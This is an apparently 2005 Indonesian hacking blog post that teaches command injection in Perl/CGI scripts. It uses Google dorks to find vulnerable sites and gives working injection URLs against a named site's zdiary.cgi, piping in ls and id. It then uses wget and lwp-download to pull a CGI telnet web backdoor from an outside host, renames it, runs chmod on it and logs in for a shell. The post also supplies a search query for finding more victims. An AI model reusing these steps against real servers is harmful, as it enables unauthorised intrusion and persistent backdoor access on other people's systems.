Thursday, August 25, 2005 |
CGI - Perl Exploit |
EXPLOITASI COMMAND EXECUTION DI PERL / CGI by BLAHPLOK aka CHOI
Khusus buat #e-c-ho, #indonesiahack, #jambihackerlink
Disini nggak akan dijelaskan mengapa command execution ini bisa terjadi, Kalo ingin mengcari tahu, silahkan mencari di google dan baca … So, Kita langsung ajah….
SATU : Mencari Target… 1. Buka Opera, internet explorer, mozilla dll 2. Masukkan alamat www.google.com di address bar 3. Masukkan keyword pencarian. Catatan : Trick menggunakan keyword dalam mencari bug cgi / perl : a. Gunakan words / kata2 yang mengarah secara langsung pada hal yang akan kita cari b. Gunakan key “allinurl:” c. Gunakan tanda petik ganda (“) jika diperlukan contoh 1: allinurl: “news.cgi?news=” txt Ini akan mencari semua url yang mengandung url news.cgi?news=, dan file yang akan Di buka yakni file dengan ektensi txt. Contoh 2 : allinurl: cgi action dat ini akan mencari semua url yang ada kata cgi, action dan dat, jadi biasanya url yang didapat adalah url yang mangandung file dengan akhiran .cgi ato .pl diikuti dengan parameter action dan membuka file dengan ektensi dat. (dengan key inilah bug WPS_SHOPPING ditemukan). 4. Oke sekarang kita telah memasukkan keyword yang kita inginkan. Dalam contoh ini kita akan mengunakan keyword = allinurl: cgi action file dat -> lalu klick cari/search dan hasilnya ………………………………………..:
DUA: Exploitasi:
1. Sekarang kita masuk ke exploitasi : Dalam exploitasi cgi/perl sangat mudah sekali. Yakni kita hanya memerlukan dua Karackter penting yaitu ‘|’ dan ‘;’ yang di letakkan pada tempat nama file yang akan dibuka. Sebagai contoh: Sekarang kita lihat url pada halaman pertama, yakni : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat&page=0 Klick kanan url tersebut dan klick open in new window. Setelah terbuka alamat url tersebut, Sekarang kita tambahkan character penting tersebut diatas, yakni pipe ‘|’. Pada akhir nama file yang akan dibuka yakni : file=.file0011.dat|ls| http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|ls|&page=0 (ls dalam command di linux shell adalah sama dengan dir pada windows, yakni melihat seluruh file directory aktif) yupe, sekarang kita bisa melihat pada tampilan halaman, ada perubahan tampilan, yakni disitu terlihat yang semula berisi huruf2 jepang, sekarang ada tulisan file. Itu artinya webserver tersebut vulnerable untuk di hack…!!!! Catatan: Tidak semua file cgi yang vulnerable ketika kita tambahkan char ‘|ls|’ Akan menampilkan file2-nya di browser. Ada yang tidak terlihat dan ada yang terlihat. Yupe, sekarang coba kita lihat id kita: http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|id|&page=0 hasilnya : uid = bla bla bla Asal uid bukan nobody, maka kita nggak akan kesulitan untuk langkah selanjutnya.
2. Memasukkan backdoor. (web backdoor) Kita bisa memasukkan beberapa jenis backdoor seperti bindtty dll............ Kenapa saya memilih web backdoor..??? karena web backdoor ini merupakan Backdoor yang sangat ampuh (menurut saya). Sulit di deteksi (apalagi kalo pake penyamaran nama file yang bener2 ok) Tidak terpengaruh oleh firewall dan admin web pada saat mengecek koneksi yang terjadi pada web-nya, yang mereka tau adalah kita hanya seperti browsing biasa. Karena kita melakukannya lewat port 80….!!! Saya menggunakan backdoor dari "http://www.rohitab.com/cgiscripts/cgitelnet.txt" Baik sekarang kita akan melakukan uploading backdoor tersebut ke web target. Dalam mengupload backdoor, kita akan menggunakan command wget. Yakni command di linux yang khusus untuk download ke web server. Catatan : Tidak semua server menginstall wget, dan jika itu terjadi, maka pilihan kita selanjutnya Adalah menggunakan lwp-download, fasilitas download dari perl.
Contoh : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|wget http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0 Kita mengambil cgitelnet.txt dari http://www.rohitab.com/cgiscripts/cgitelnet.txt, Yang selanjutnya akan di save di http://www.mikazo.net/cgiscript/sample/zdiary/ Sekarang kita check apakah kita berhasil ato tidak. http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt jika ada pesan error file not found, berarti kita gagal menggunakan wget, selanjutnya kita coba alternatif kedua : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|lwp-download http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0 sekarang kita chek lagi : http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt Yupe sekarang ada tampilan source dari cgitelnet.txt. Selamat berhasil….!!!! :P~ Baik sekarang apa selanjutnya..??? Selanjutnya adalah kita harus merubah nama cgitelnet.txt ke cgitelnet.cgi dan merubah Chmod-nya ke 755 agar kita bisa mengexekusi-nya. a. Merubah nama cgitelnet.txt ke cgitelnet.cgi http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|mv cgitelnet.txt cgitelnet.cgi|&page=0 b. Merubah chmod ke 755 http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|chmod 755 cgitelnet.cgi|&page=0
TIGA : Execkusi backdoor dan selancar di system target
Oke, sekarang kita telah berhasil memasukkan backdoor ke web target. Sekarang coba kita exekusi: http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.cgi tampilan yang muncul adalah : login: admin password: enter
baik sekarang kita masukkan password. Password = changeme daaaannn…. Hasilnya adalah :
[admin@www.mikazo.net /home/s20144-1/public_html/cgiscript/sample/zdiary]$
selesai….!!!!!
Oke, sekarang info: Pada contoh di atas, saya menggunakan bug pada zdiary.cgi. zdiary v1.51, v1.52 (all version) by mikazo untuk mencari webserver yang menginstall zdiary, gunakan key word pada google sebagai berikut : allinurl: “zdiary.cgi” |
posted by banjar-hack @ 7:33 AM |
|
|
|
|
The Time |
|
Previous Post |
|
Archives |
|
it's You? |
|
Links |
SecurityDownload |
Powered by |
|
|